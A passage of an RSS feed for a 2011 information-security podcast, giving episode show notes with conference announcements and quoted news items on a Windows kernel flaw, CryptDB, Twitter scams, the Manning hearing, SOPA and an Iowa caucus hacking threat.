	<span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">In a message on Twitter, a </span><a href="https://twitter.com/#%21/w3bd3vil/status/148454992989261824"><span style="font-size:15px;font-family:Arial;color:#000099;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:underline;vertical-align:baseline;">researcher named w3bd3vil</span></a><span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;"> said that he had found a method for exploiting the vulnerability by simply feeding an iframe with an overly large height to Safari. The exploit gives the attacker the ability to run arbitrary code on the victim&#39;s machine.</span></p>
<p>	<span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">&quot;A vulnerability has been discovered in Microsoft Windows, which can be exploited by malicious people to potentially compromise a user&#39;s system. The vulnerability is caused due to an error in win32k.sys and can be exploited to corrupt memory via e.g. a specially crafted web page containing an IFRAME with an overly large &quot;height&quot; attribute viewed using the Apple Safari browser. Successful exploitation may allow execution of arbitrary code with kernel-mode privileges,&quot; the </span><a href="https://secunia.com/advisories/47237/"><span style="font-size:15px;font-family:Arial;color:#000099;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:underline;vertical-align:baseline;">Secunia advisory</span></a><span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;"> said.</span><br />
	<span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">Microsoft officials have not confirmed the vulnerability, but said that they&#39;re looking into it.</span><br />
	<span style="font-size:15px;font-family:Arial;color:#000000;background-color:#ffffff;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">&hellip;.</span><br />
	<span style="font-size:15px;font-family:Arial;color:#000000;background-color:#ffffff;font-weight:bold;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">Source:</span><span style="font-size:15px;font-family:Arial;color:#000000;background-color:#ffffff;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;"> &nbsp;</span><a href="http://css.csail.mit.edu/cryptdb/"><span style="font-size:15px;font-family:Arial;color:#000099;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:underline;vertical-align:baseline;">http://css.csail.mit.edu/cryptdb/</span></a></p>
<p>	<span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">For the last three decades or so, the big problem in using encryption hasn&rsquo;t been whether strongly encrypted files can be cracked. The problem remains that to actually do anything with encrypted data&mdash;search it, sort it, or perform computations with it&ndash;that data must be decrypted and exposed to prying eyes.</span></p>
<p>	<span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">Now the Google- and Citigroup-funded work of three MIT scientists holds the promise of solving that long-nagging issue in some of the computing world&rsquo;s most common applications. CryptDB, a piece of database software the researchers presented in a paper (</span><a href="http://people.csail.mit.edu/nickolai/papers/raluca-cryptdb.pdf"><span style="font-size:15px;font-family:Arial;color:#000099;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:underline;vertical-align:baseline;">PDF here</span></a><span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">) at the Symposium on Operating System Principles in October, allows users to send queries to an encrypted set of data and get almost any answer they need from it without ever decrypting the stored information, a trick that keeps the info safe from hackers, accidental loss and even snooping administrators. And while it&rsquo;s not the first system to offer that kind of magically flexible cryptography, it may be the first practical one, taking a fraction of a second to produce an answer where other systems that perform the same encrypted functions would require thousands of years.</span></p>
<p>	<span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">Cryptographers have long sought to implement a system they call &ldquo;fully homomorphic encryption,&rdquo; in which a user can encrypt data into indecipherable strings of numbers, do math with those strings, and then decrypt the results to get the same answer he or she would have if the data hadn&rsquo;t been encrypted at all. That&rsquo;s a useful trick if you need to perform operations on health care or financial data in a situation like cloud computing, where the computer (or the IT administrator) doing the calculations can&rsquo;t always be trusted to access the private numbers being crunched. IBM cryptographer Craig Gentry compares the idea to &ldquo;one of those boxes with the gloves that are used to handle toxic chemicals,&rdquo; as he once put it. &ldquo;All the manipulation happens inside the box, and the chemicals are never exposed to the outside world.&rdquo;</span></p>
<p>	&nbsp;</p>
]]></content:encoded>
			<wfw:commentRss>http://www.isdpodcast.com/episode-550-armitage-easy-android-shell-unfollow-manning-update-nothing-windows-7-0-day-mit-cryptdb/feed</wfw:commentRss>
		<slash:comments>0</slash:comments>
			<enclosure url="http://www.isdpodcast.com/podpress_trac/feed/3291/0/infosec-daily-podcast-episode-550.mp3" length="18680203" type="audio/mpeg" />
		<itunes:duration>0:38:52</itunes:duration>
		<itunes:subtitle>InfoSec Daily Podcast Episode 550 for December 20, 2011. &#160;Tonight&#39;s podcast is hosted by Rick Hayes, Boris Sverdlik, Beau Woods, Karthik Rangarajan, and Themson Mester.
	&#160;
Announcements:
Brad Smith (theNurse)
	We all know and love Brad[...]</itunes:subtitle>
		<itunes:summary>InfoSec Daily Podcast Episode 550 for December 20, 2011. &#160;Tonight&#39;s podcast is hosted by Rick Hayes, Boris Sverdlik, Beau Woods, Karthik Rangarajan, and Themson Mester.
	&#160;
Announcements:
Brad Smith (theNurse)
	We all know and love Brad Smith, aka theNurse. &#160;His humor and smiling positivity is a wonderful example for our community. &#160;At Hacker Halted he had a massive stroke and has been in the hospital for almost a month.
	Brad and his wife did not ask for this help, but as a community we feel that if we can help we want to. &#160;Please feel free to check in for status or to donate. &#160;Either way we thank you and I know Brad thanks your for your support, prayers and positive thoughts.
	http://www.social-engineer.org/brad-smith-updates/
	http://www.social-engineer.org/bradsmithdonation/
	CampusCon 2012
	When: January 21, 2012
	Where: WIT {Waterford Institute of Technology} Sports &#8211; Waterford, Ireland
	http://campuscon.hackingwit.com
	(from Baconzombie)
	SANS Mentoring: Security 401 SANS Security Essentials Bootcamp Style
	When: Starts January 24, 2012
	Where: Atlanta, GA
	Discount Code:
	http://www.sans.org/mentor/details.php?nid=25484
	ShmooCon 2012
	When: January 27th-29th, 2012
	Where: Washington Hilton Hotel, Washington, DC
	http://www.shmoocon.org
	Linuxfest Northwest 2012
	When: Saturday, April 28th-29th, 2012
	Where: Bellingham Technical College &#8211; Bellingham, WA
	http://www.linuxfestnorthwest.org/
	CFP now open!
	AIDE 2012
	When: May 21-25, 2012
	Where: MU Forensic Science Center
	Huntington, West Virginia 
	http://aide.marshall.edu
	CFP now open!
	DerbyCon 2012 &#8211; &#34;Dropping the Deuce&#34;
	When: &#160;September 27-30, 2012
	Where: Louisville, KY
	http://www.derbycon.com
	Thanks to everyone that has purchased products from Amazon through the affiliate program. &#160;If you&#8217;re not familiar with the affiliate program, simply go to http://www.isdpodcast.com and locate the Affiliate Program link on the right hand side.
	You don't have a sufficient version of Flash Player to display this animation.
	&#160;
Stories
Source: http://dl.packetstormsecurity.net/papers/general/Armitage-hacking_made_easy_Part-1.pdf
	&#8230;.
	Source: &#160;http://threatpost.com/en_us/blogs/gaining-remote-shell-android-122011
	The security of Android devices has come under quite a lot of scrutiny in recent months, with researchers identifying various root exploits and permission leaks that could be exploited. In this video, researcher Thomas Cannon of ViaForensics demonstrates a method for setting up a remote shell on an Android device without using any exploits or vulnerabilities. The method works on various versions of Android, up to and including Gingerbread.
	&#8230;.
	Source: &#160;http://blog.trendmicro.com/new-unfollowed-you-scam-hits-twitter-trending-topics
	Twitter&#8216;s list of trending topics appears to have been hit hard by another variant of the familiar &#8220;see who unfollowed you&#8221; scam:
	Significant numbers of Tweets are being sent out that contain the above message: saying that a certain number of people have unfollowed them, and to find out who unfollowed you, click on the link. A few hashtags were generally attached to the end of the tweet.
	What happens when you click on the link? You are redirected to a page for a &#8220;Followers Monitor&#8221;, which leads eventually to a page asking you to authorize an application to use your Twitter account. This rogue application is able to carry out such &#8220;minor&#8221; operations as reading your tweets, updating your profile, and even posting tweets on your behalf. If you actually give the app access, of course, the first thing it will do is post its own version of the spammed Tweet.
	&#8230;.
	Source: &#160;http://www.cnn.com/2011/12/20/us/bradley-manning-hearing/index.html
	A convicted computer hacker from California testified Tuesday in Pfc. Bradley Manning&#39;s preliminary hearing about six days of chats he conducte[...]</itunes:summary>
		<itunes:keywords>Podcast</itunes:keywords>
		<itunes:author>Rick Hayes with Dave Kennedy, Boris Sverdlik, Beau Woods, Adrian Crenshaw, Karthik Rangarajan, Geordy Rostad, Themson Mester, Dr. Bonez, and Varun Sharma.</itunes:author>
		<itunes:explicit>no</itunes:explicit>
		<itunes:block>no</itunes:block>
	</item>
		<item>
		<title>Episode 549 &#8211; SOPA, Manning, Iowa, Lady Gaga &amp; China</title>
		<link>http://www.isdpodcast.com/episode-549-sopa-manning-iowa-lady-gaga-china</link>
		<comments>http://www.isdpodcast.com/episode-549-sopa-manning-iowa-lady-gaga-china#comments</comments>
		<pubDate>Tue, 20 Dec 2011 02:04:36 +0000</pubDate>
		<dc:creator>rick.hayes</dc:creator>
				<category><![CDATA[Podcast]]></category>

		<guid isPermaLink="false">http://www.isdpodcast.com/?p=3287</guid>
		<description><![CDATA[InfoSec Daily Podcast Episode 549 for December 19, 2011. &#160;Tonight&#39;s podcast is hosted by Rick Hayes, Dave Kennedy, Beau Woods, Karthik Rangarajan, Geordy Rostad, and Varun Sharma. &#160; Announcements: Brad Smith (theNurse) We all know and love Brad Smith, aka theNurse. &#160;His humor and smiling positivity is a wonderful example for our community. &#160;At Hacker [...]]]></description>
			<content:encoded><![CDATA[<p><span style="font-size:15px;font-family:Arial;color:#000000;background-color:#ffffff;font-weight:bold;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">InfoSec Daily Podcast Episode 549 for December 19, 2011. &nbsp;Tonight&#39;s podcast is hosted by Rick Hayes, Dave Kennedy, Beau Woods, Karthik Rangarajan, Geordy Rostad, and Varun Sharma.</span><br />
	&nbsp;</p>
<p dir="ltr" style="margin-right: 5pt; margin-top: 0pt; margin-bottom: 0pt;"><span style="font-size:15px;font-family:Arial;color:#000000;background-color:#ffffff;font-weight:bold;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">Announcements:</span></p>
<p><span style="font-size:15px;font-family:Arial;color:#000000;background-color:#ffffff;font-weight:bold;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">Brad Smith (theNurse)</span><br />
	<span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">We all know and love Brad Smith, aka theNurse. &nbsp;His humor and smiling positivity is a wonderful example for our community. &nbsp;At Hacker Halted he had a massive stroke and has been in the hospital for almost a month.</span></p>
<p>	<span style="font-size:15px;font-family:Arial;color:#000000;background-color:#ffffff;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">Brad and his wife did not ask for this help, but as a community we feel that if we can help we want to. &nbsp;Please feel free to check in for status or to donate. &nbsp;Either way we thank you and I know Brad thanks your for your support, prayers and positive thoughts.</span></p>
<p>	<a href="http://www.social-engineer.org/brad-smith-updates/"><span style="font-size:15px;font-family:Arial;color:#000099;background-color:#ffffff;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:underline;vertical-align:baseline;">http://www.social-engineer.org/brad-smith-updates/</span></a><br />
	<a href="http://www.social-engineer.org/bradsmithdonation/"><span style="font-size:15px;font-family:Arial;color:#000099;background-color:#ffffff;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:underline;vertical-align:baseline;">http://www.social-engineer.org/bradsmithdonation/</span></a></p>
<p>	<span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:bold;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">CampusCon 2012</span><br />
	<span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">When: January 21, 2012</span><br />
	<span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">Where: WIT {Waterford Institute of Technology} Sports &#8211; Waterford, Ireland</span><br />
	<a href="http://campuscon.hackingwit.com/"><span style="font-size:15px;font-family:Arial;color:#000099;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:underline;vertical-align:baseline;">http://campuscon.hackingwit.com</span></a><br />
	<span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:bold;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">(from Baconzombie)</span></p>
<p>	<span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:bold;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">SANS Mentoring: Security 401 SANS Security Essentials Bootcamp Style</span><br />
	<span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">When: Starts January 24, 2012</span><br />
	<span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">Where: Atlanta, GA</span><br />
	<span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">Discount Code:</span><br />
	<a href="http://www.sans.org/mentor/details.php?nid=25484"><span style="font-size:15px;font-family:Arial;color:#000099;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:underline;vertical-align:baseline;">http://www.sans.org/mentor/details.php?nid=25484</span></a></p>
<p>	<span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:bold;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">ShmooCon 2012</span><br />
	<span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">When: January 27th-29th, 2012</span><br />
	<span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">Where: Washington Hilton Hotel, Washington, DC</span><br />
	<a href="http://www.shmoocon.org/"><span style="font-size:15px;font-family:Arial;color:#000099;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:underline;vertical-align:baseline;">http://www.shmoocon.org</span></a></p>
<p>	<span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:bold;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">Linuxfest Northwest 2012</span><br />
	<span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">When: Saturday, April 28th-29th, 2012</span><br />
	<span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">Where: Bellingham Technical College &#8211; Bellingham, WA</span><br />
	<a href="http://www.linuxfestnorthwest.org/"><span style="font-size:15px;font-family:Arial;color:#000099;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:underline;vertical-align:baseline;">http://www.linuxfestnorthwest.org/</span></a><br />
	<span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:bold;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">CFP now open!</span></p>
<p>	<span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:bold;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">AIDE 2012</span><br />
	<span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">When: May 21-25, 2012</span><br />
	<span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">Where: MU Forensic Science Center</span><br />
	<span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">Huntington, West Virginia </span><br />
	<a href="http://aide.marshall.edu/"><span style="font-size:15px;font-family:Arial;color:#000099;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:underline;vertical-align:baseline;">http://aide.marshall.edu</span></a><br />
	<span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:bold;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">CFP now open!</span></p>
<p>	<span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:bold;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">DerbyCon 2012 &#8211; &quot;Dropping the Deuce&quot;</span><br />
	<span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">When: &nbsp;September 27-30, 2012</span><br />
	<span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">Where: Louisville, KY</span><br />
	<a href="http://www.derbycon.com/"><span style="font-size:15px;font-family:Arial;color:#000099;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:underline;vertical-align:baseline;">http://www.derbycon.com</span></a></p>
<p>	<span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">Thanks to everyone that has purchased products from Amazon through the affiliate program. &nbsp;If you&rsquo;re not familiar with the affiliate program, simply go to</span><a href="../"><span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;"> </span><span style="font-size:15px;font-family:Arial;color:#000099;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:underline;vertical-align:baseline;">http://www.isdpodcast.com</span></a><span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;"> and locate the Affiliate Program link on the right hand side.</span></p>
<p>	<span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;"><div class="awshortcode-carrousel align&amp;quot;right&amp;quot;"><object type="application/x-shockwave-flash" data="http://ws.amazon.com/widgets/q?ServiceVersion=20070822&amp;MarketPlace=US&amp;ID=V20070822%2FUS%2Finfdaipod-20%2F8010%2Fea25e3ef-5027-40e4-a56f-ad6cfcd06cb3&amp;Operation=GetDisplayTemplate" width="600" height="200"><param name="movie" value="http://ws.amazon.com/widgets/q?ServiceVersion=20070822&amp;MarketPlace=US&amp;ID=V20070822%2FUS%2Finfdaipod-20%2F8010%2Fea25e3ef-5027-40e4-a56f-ad6cfcd06cb3&amp;Operation=GetDisplayTemplate" /><param name="bgcolor" value="#fff" /><param name="quality" value="high" /><param name="allowscriptaccess" value="always" /><param name="wmode" value="transparent" /><p>You don't have a sufficient version of Flash Player to display this animation.</p></object></div></span><br />
	&nbsp;</p>
<p dir="ltr" style="margin-left: 5pt;margin-right: 5pt;text-indent: -4pt; margin-top: 0pt; margin-bottom: 0pt;"><span style="font-size:15px;font-family:Arial;color:#000000;background-color:#ffffff;font-weight:bold;font-style:normal;font-variant:normal;text-decoration:underline;vertical-align:baseline;">Stories</span></p>
<p><span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:bold;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">Source:</span><span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;"> </span><a href="http://www.globalpost.com/dispatch/news/regions/americas/united-states/111216/anonymous-hackers-sopa-vote-congress"><span style="font-size:15px;font-family:Arial;color:#000099;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:underline;vertical-align:baseline;">http://www.globalpost.com/dispatch/news/regions/americas/united-states/111216/anonymous-hackers-sopa-vote-congress</span></a></p>
<p>	<span style="font-size:15px;font-family:Arial;color:#000000;background-color:#fafafa;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">In response to a bill now before Congress, which opponents say would dramatically erode Internet freedom, the free and fair use of copyrighted material and online privacy, hacker groups have begun to publicly threaten to launch attacks on US government workers and websites.</span></p>
<p>	<span style="font-size:15px;font-family:Arial;color:#000000;background-color:#fafafa;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">The US House Judiciary Committee debated for a second day on Friday the Stop Online Piracy Act (SOPA), a bill that would bestow the US Department of Justice and individual copyright holders with unprecedented powers to shut down websites and crack down on users for what they deem to be violations of copyrights.</span></p>
<p>	<span style="font-size:15px;font-family:Arial;color:#000000;background-color:#fafafa;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">The vote was postponed after day two of the debate after a wayward tweet derailed talks on Thursday. Rep. Steve King (R &ndash; Iowa) tweeted that Rep. Sheila Jackson Lee (D &ndash; TX) was &ldquo;boring.&rdquo; The hearing then grinded to a halt after Jackson Lee took issue with the offensive comment. The hearing fell behind schedule and the vote was delayed until Dec. 21.</span><br />
	<span style="font-size:15px;font-family:Arial;color:#000000;background-color:#fafafa;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">The delay will give the bill&rsquo;s detractors more time to organize its calls for the bill to be dropped. The bill as it now stands appears to have enough votes to pass the House of Representatives and move on to the Senate.</span><br />
	<span style="font-size:15px;font-family:Arial;color:#000000;background-color:#fafafa;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">&hellip;.</span><br />
	<span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">Anonymous hackers are lining up to take down the US government if SOPA passes. &nbsp;From the picture, it looks like must be lining up at the Apple store&#8230;</span><br />
	<span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">&hellip;.</span><br />
	<span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:bold;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">Source:</span><span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;"> </span><a href="http://www.usatoday.com/news/military/story/2011-12-19/manning-wikileaks-hearing/52074010/1"><span style="font-size:15px;font-family:Arial;color:#000099;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:underline;vertical-align:baseline;">http://www.usatoday.com/news/military/story/2011-12-19/manning-wikileaks-hearing/52074010/1</span></a></p>
<p>	<span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">Computer forensics investigators testified Monday that the computer of a soldier accused of sharing military secrets contained thousands of sensitive files and logs of conversations between himself and a former hacker who turned him in.</span></p>
<p>	<span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">Investigators said they found evidence Army Pfc. Bradley Manning downloaded thousands diplomatic cables, Guantanamo assessment documents, video from a controversial 2007 airstrike in Baghdad and military records of a 2009 U.S. airstrike in Gerani, Afghanistan, in which dozens of civilians were found dead.</span></p>
<p>	<span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">As the evidentiary hearing for Manning entered its fourth day, the government had called 13 witnesses and was expected to ask eight more to testify before the defense presents its case. Expected to last several more days, the hearing will help determine whether Manning should be court-martialed on 22 charges, including aiding the enemy. If convicted at court-martial, Manning could face life in prison.</span></p>
<p>	<span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">Manning, 24, of Crescent, Okla., is accused of giving the secrets-sharing website WikiLeaks a trove of government material while working as an intelligence analyst in Iraq in 2009 and 2010, including Iraq and Afghanistan war logs, and State Department cables.</span><br />
	<span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">&hellip;.</span><br />
	<span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:bold;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">Source: </span><span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">&nbsp;</span><a href="http://blog.al.com/wire/2011/12/hacker_threat_to_iowa_caucus_v.html"><span style="font-size:15px;font-family:Arial;color:#000099;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:underline;vertical-align:baseline;">http://blog.al.com/wire/2011/12/hacker_threat_to_iowa_caucus_v.html</span></a></p>
<p>	<span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">Taking seriously an apparent threat from a notorious collective of computer hackers, the Iowa Republican Party is boosting the security of the electronic systems it will use in two weeks to count the first votes of the 2012 presidential campaign.</span></p>
<p>	<span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">Investigators don&#39;t know if the threat is authentic, but it has nonetheless led the state party to confront a worst-case scenario. Their fear: an Iowa caucus marred by hackers who corrupt the database used to gather votes and crash the website used to inform the public about results that can shape the campaign for the White House.</span></p>
<p>	<span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">&quot;With the eyes of the media on the state, the last thing we want to do is have a situation where there is trouble with the reporting system,&quot; said Wes Enos, a member of the Iowa GOP&#39;s central committee and the political director for Minnesota Rep. Michele Bachmann&#39;s campaign in the state. &quot;We don&#39;t want that to be the story.&quot;</span></p>
<p>	<span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">Confident in the existing safeguards protecting the vote count itself, Enos and other members of the party central committee told The Associated Press they recently authorized additional security measures aimed at ensuring hackers are unable to delay the release of caucus results.</span></p>
<p>	<span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">The state GOP fears such a delay could disrupt the traditional influence of Iowa&#39;s first-in-the-nation vote. Candidates who do well tend to gain momentum in the presidential race, while those finishing at the back of the pack may drop out. Experts in computer security said such concerns are valid.</span></p>
<p>	<span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">&quot;It&#39;s very clear the data consolidation and data gathering from the caucuses, which determines the headlines the next morning, who might withdraw or resign from the process, all of that is fragile,&quot; said Douglas Jones, a computer science professor at the University of Iowa who has consulted for both political parties.</span></p>
<p>	<span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">&quot;If I were one of these &#39;hacktivists&#39; who had no scruples, I would be really strongly tempted to see if I could get into the computer and see if I could make &#39;SpongeBob SquarePants&#39; win.&quot;</span><br />
	<span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">&hellip;.</span><br />
	<span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:bold;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">Source: </span><span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">&nbsp;</span><a href="http://community.websense.com/blogs/securitylabs/archive/2011/12/19/lady-gaga-s-twitter-account-tweeting-links-to-survey-scam.aspx"><span style="font-size:15px;font-family:Arial;color:#000099;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:underline;vertical-align:baseline;">http://community.websense.com/blogs/securitylabs/archive/2011/12/19/lady-gaga-s-twitter-account-tweeting-links-to-survey-scam.aspx</span></a></p>
<p>	<span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">The Twitter account of famous singer Lady Gaga has apparently been hacked. It&#39;s being used by attackers to lure her more than 17 million followers to click on a link:</span><br />
